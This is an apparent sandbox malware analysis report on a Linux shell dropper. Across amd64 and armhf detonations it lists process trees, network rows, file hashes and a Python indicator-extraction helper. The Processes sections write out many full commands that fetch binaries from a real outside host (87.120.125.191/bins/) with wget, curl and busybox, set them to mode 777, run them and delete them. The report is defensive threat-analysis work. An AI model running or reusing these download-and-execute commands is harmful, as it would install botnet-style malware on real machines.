Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-d55apazlg1
Target d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
SHA256 d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
7/10

SHA256

d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76

Threat Level: Shows suspicious behavior

Verdict for d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh: shows suspicious behavior (score 7/10). What the detonations record is a download-and-execute loop: the script deletes bins.sh, then for each of 14 differently named files fetches http://87.120.125.191/bins/<name> with wget, curl and busybox wget, sets mode 777 on the file, runs it from /tmp and deletes it, and then repeats the whole loop once more. A loop of this shape, one payload name after another from a /bins/ directory, is what IoT-botnet droppers use to try one binary per CPU architecture; that reading is an assessment from the observed chain, since the report assigns no malware family and records no architecture for the payloads.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

7s

Max time network

129s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (28 identical rows, one per chmod 777 invocation in the process list below)

Executes dropped EXE

Description Indicator Process Target
N/A <path> <path> N/A, one row per execution. 28 rows in total: each of the 14 dropped binaries below is executed twice, once in each pass of the loop.
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A (2 rows)
N/A N/A /bin/busybox N/A (2 rows)
N/A N/A /bin/rm N/A (2 rows)
N/A N/A /usr/bin/wget N/A (2 rows)
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A (2 rows)

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd is the only one of the 14 dropped binaries that raises this signature, and it does so on both the amd64 and the armhf guest (see behavioral2); the other hits come from the downloader tools and rm.

Writes file to tmp directory

Description Indicator Process Target
File opened for modification <path> /usr/bin/curl N/A, one row per write. 28 rows in total, two per dropped binary, all attributed to /usr/bin/curl (the curl -O step of the loop):
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

From here on the script repeats one six-step sequence per dropped binary. It is written below once, with NAME standing for the binary's file name: three download commands are issued for every file (wget, curl -O, busybox wget), the file is set to mode 777, run from /tmp, and deleted.

/usr/bin/wget

[wget http://87.120.125.191/bins/NAME]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/NAME]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/NAME]

/bin/chmod

[chmod 777 NAME]

/tmp/NAME

[./NAME]

/bin/rm

[rm NAME]

The sequence ran 28 times in this detonation: two passes over the same 14 names, in a different order each time.

First pass, in order:
fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
g94Q6IpdHco1kY4euvU50notlQI0EU32gd
0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

Second pass, in order:
CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
g94Q6IpdHco1kY4euvU50notlQI0EU32gd
0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

Network

Country Destination Domain Proto Rows
BG 87.120.125.191:80 87.120.125.191 tcp 84
N/A 224.0.0.251:5353 N/A udp 1
GB 185.125.188.62:443 N/A tcp 1
GB 185.125.188.61:443 N/A tcp 1
US 151.101.193.91:443 N/A tcp 2
GB 195.181.164.14:443 N/A tcp 1

The 84 connections to 87.120.125.191:80 are the download traffic: 28 loop iterations times three fetch commands each (wget, curl -O, busybox wget). None of the remaining destinations appears in any command line in the process list. The mDNS multicast and the four HTTPS endpoints are consistent with background traffic from the Ubuntu guest rather than with sample activity, so they should not be carried as indicators for this sample.
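The Processes and Network sections above are the raw evidence for this verdict. The following Python is an added example, not part of the sandbox report and not any sandbox's API: it reconstructs the per-file fetch, chmod 777, execute and delete chain from command lines of the kind listed under Processes, derives the download host and dropped file names from that chain, and then uses the derived hosts to decide which Network rows the sample actually explains. PROCESS_LOG and NETWORK_ROWS are constructed from the report's own entries, abbreviated to two binaries and six network rows; every function name is this example's own.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed input: command lines copied from the behavioral1 Processes
# section in execution order, abbreviated to the first two dropped binaries.
PROCESS_LOG = [
    "/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh",
    "/bin/rm bins.sh",
    "wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk",
    "wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
    "curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
    "/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
    "chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
    "./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
    "rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2",
]

# Constructed input: a subset of the Network table as (country, destination, proto).
NETWORK_ROWS = [
    ("BG", "87.120.125.191:80", "tcp"),
    ("N/A", "224.0.0.251:5353", "udp"),
    ("BG", "87.120.125.191:80", "tcp"),
    ("GB", "185.125.188.62:443", "tcp"),
    ("US", "151.101.193.91:443", "tcp"),
    ("BG", "87.120.125.191:80", "tcp"),
]

URL_RE = re.compile(r"https?://\S+")


@dataclass
class DropperChain:
    """Per-file record of the fetch / chmod / execute / delete sequence."""
    name: str
    urls: list = field(default_factory=list)  # one entry per fetch attempt
    chmod_mode: str = ""
    executed: bool = False
    deleted: bool = False

    @property
    def complete(self) -> bool:
        return bool(self.urls) and bool(self.chmod_mode) and self.executed and self.deleted


def _is_download(tokens):
    """wget, curl, or busybox's wget applet, with or without a directory prefix."""
    prog = tokens[0].rsplit("/", 1)[-1]
    return prog in ("wget", "curl") or (prog == "busybox" and tokens[1:2] == ["wget"])


def reconstruct_chains(cmdlines):
    """Group command lines by dropped file name and mark each step seen."""
    chains = {}
    for cmd in cmdlines:
        tokens = cmd.split()
        url = URL_RE.search(cmd)
        if url and _is_download(tokens):
            name = urlparse(url.group()).path.rsplit("/", 1)[-1]
            chains.setdefault(name, DropperChain(name)).urls.append(url.group())
        elif tokens[0] == "chmod" and len(tokens) == 3:
            chains.setdefault(tokens[2], DropperChain(tokens[2])).chmod_mode = tokens[1]
        elif tokens[0].startswith("./"):
            # The cwd is not in the command line; the report's process path shows /tmp.
            name = tokens[0][2:]
            chains.setdefault(name, DropperChain(name)).executed = True
        elif tokens[0].rsplit("/", 1)[-1] == "rm" and tokens[1:] and tokens[1] in chains:
            chains[tokens[1]].deleted = True
    return chains


def extract_iocs(chains):
    """Download hosts (with attempt counts), URLs, dropped names, and the names
    that went through the whole chain with a world-writable mode (chmod 777)."""
    hosts, urls = Counter(), set()
    for chain in chains.values():
        for u in chain.urls:
            p = urlparse(u)
            hosts[f"{p.hostname}:{p.port or 80}"] += 1
            urls.add(u)
    full = sorted(n for n, c in chains.items() if c.complete and c.chmod_mode == "777")
    return {"hosts": hosts, "urls": sorted(urls), "dropped": sorted(chains), "chain_777": full}


def classify_network(rows, iocs):
    """Split network rows into those a command line explains and the rest."""
    attributed, unattributed = Counter(), Counter()
    for _country, dest, proto in rows:
        bucket = attributed if dest in iocs["hosts"] else unattributed
        bucket[f"{dest}/{proto}"] += 1
    return attributed, unattributed
```

Fed the full process list from this report, the chain check matches all 14 names in both passes and the host counter for 87.120.125.191:80 comes to 84, the same as the number of port-80 rows in the Network table; every other destination lands in the unattributed bucket. The chmod_mode check is deliberately stricter than "made executable": a dropper that sets 777 leaves the payload world-writable as well, which is a stronger signal than a bare +x.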

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-armhf-20240418-en

Max time kernel

23s

Max time network

25s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (19 identical rows, one per chmod 777 invocation in this shorter armhf run)

Executes dropped EXE

Description Indicator Process Target
N/A <path> <path> N/A, one row per execution. 19 rows in total: the 14 binaries of the first pass, then the first five of the second pass (this run is shorter than behavioral1; max time kernel 23 s).
First pass, in order:
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
Second pass, in order:
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A (19 identical rows, one per curl invocation)

Every hit in this signature, and in "Reads runtime system information" below, is raised by /usr/bin/curl on the armhf guest, not by the sample script or by any of the dropped binaries. Reading /proc/cpuinfo and /proc/self/auxv is routine CPU-feature probing by the C library and the crypto library on ARM, and /proc/sys/crypto/fips_enabled is the kernel's FIPS-mode flag that common TLS libraries consult at initialization. The antivm tag on this sample therefore rests on tool behaviour, not on evasion logic in the script, and should be weighted accordingly.

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A (19 rows)
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (19 rows)

The 38 rows are interleaved in the original listing; each curl invocation accounts for one of each.

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A (2 rows)
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification <path> /usr/bin/curl N/A, one row per write. 19 rows in total, all attributed to /usr/bin/curl: one for each of the 14 dropped binaries below, plus a second write for the five that the second pass reached (RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0, fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk, QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2, c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1, CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy).
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

